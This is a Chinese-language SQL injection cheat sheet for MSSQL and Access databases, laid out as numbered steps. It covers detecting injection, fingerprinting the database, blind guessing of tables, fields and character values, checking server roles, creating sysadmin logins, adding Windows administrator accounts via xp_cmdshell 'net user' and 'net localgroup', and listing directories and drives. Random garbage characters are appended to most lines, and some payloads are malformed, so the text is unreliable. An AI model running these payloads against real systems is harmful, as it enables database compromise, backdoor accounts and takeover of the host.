1.判断是否有注入;and 1=1 ;and 1=2 KqK9X
2.初步判断是否是mssql ;and user>0 ke^d8Z.
h(|;\ ~
3.注入参数是字符'and [查询条件] and ''=' mZE8.`
.v\PilF
4.搜索时没过滤参数的'and [查询条件] and '%25'=' `{<JC{yc?
Tm\OYYyk
5.判断数据库系统 *7_@7=W,
9 R
;and (select count(*) from sysobjects)>0 mssql BtID;^Dz
^X^,>Z|
;and (select count(*) from msysobjects)>0 access mV%h[~-
r*]uR /Z$
@C07k^j=U
,0h3x$l)
6.猜数据库 ;and (select Count(*) from [数据库名])>0 XR<G}x
@ce3%`c_
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ,$ mLL
`^zQ$au'u
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ^H-QYuz:T0
smbUu/
9.(1)猜字段的ascii值(access) NU(^6
,uO?;!t
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 rX:1_q`xA
t+J)dr
(2)猜字段的ascii值(mssql) {RH*8?7
cT I,1U
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 &jFKc0\i@
xp(mB7;:
10.测试权限结构(mssql) "s${!A)
?N(u4atC
y6\ [1nZ
zQn//7#-G
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- @
E >eq.m
uFWvtL?;_
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ~ J %m
\ x:_*`fU
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- yTP[,bM
%@o&*pF^,
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- V!\n3i?i
JTjzT2`A.
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- xTGP
juR
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 1 iquHn
p
FXd4*
;and 1=(select IS_MEMBER('db_owner'));-- F>TYVxQ
#DrZ`Aq
p?_'|#tz
.&Y,D-h}7|
11.添加mssql和系统的帐户 %}\ vW
3LT+9ad2d
;exec master.dbo.sp_addlogin username;-- MM=W9#
;exec master.dbo.sp_password null,username,password;-- VyRW '
\\y}DNh
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- vR<fdV
t*eleNYeS~
;exec master.dbo.xp_cmdshell 'net user username password nl.~^CP
0c%@e2(N
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- b,=,px
[]^PJ
;exec master.dbo.xp_cmdshell 'net user username password /add';-- &@-1"-H
~+7a d$
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- TJeou#=/
"cIGNTLFA
!pG+Ak?
)6PJ*;p-
12.(1)遍历目录 6z1aG9G
e5]&1^+
;create table dirs(paths varchar(100), id int) Q=)"om
$71i+h]_
;insert dirs exec master.dbo.xp_dirtree 'c:\' fhVbJU
QwKky ^A
;and (select top 1 paths from dirs)>0 Ah(\%35&
5<'n
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) j+z'
!gD 3CA
vHZX9LQU0+
XhJ P87A
(2)遍历目录 D5o+0R
l}U~I
3}).
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- yVu^
>
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 bxPY'&